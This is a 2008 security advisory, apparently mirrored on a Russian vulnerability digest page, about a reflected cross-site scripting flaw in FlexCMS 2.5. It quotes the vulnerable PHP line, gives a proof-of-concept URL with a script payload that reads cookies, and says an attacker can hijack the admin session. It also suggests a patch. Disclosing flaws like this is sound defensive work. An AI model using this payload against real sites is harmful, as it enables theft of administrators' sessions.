Дополнительная информация

Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171

NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

PHP Live Helper <= 2.0.1 Multiple Vulnerabilities

munky-bliki lfi

From:	irancrash_(at)_gmail.com <irancrash_(at)_gmail.com>
Date:	18 августа 2008 г.
Subject:	FlexCMS <= 2.5 Cross Site Scripting Vulnerability

----------------------------------------------------------------

Script : FlexCMS <= 2.5

Type : Cross Site Scripting Vulnerability

Alert : Low

----------------------------------------------------------------

Download From : http://www.flexcms.com/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Cross Site Scripting Vulnerability :

File Name : inc-core-admin-editor-previouscolorsjs.php

Vulnerable Variable : PreviousColorsString

Send Method : GET

Register_globals : On

Dangerous PHP Code (LINE 53) :  print 'document.write(\''.$PreviousColorsString.
'\');';

Address :
http://example/inc-core-admin-editor-previouscolorsjs.
php?PreviousColorsString=<script>alert(document.
cookie)</script>

Attacker can hijack admin cookie with this vulnerability ....

Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ...


----------------------------------------------------------------

                       Tnx : God

                    HTTP://IRCRASH.COM

----------------------------------------------------------------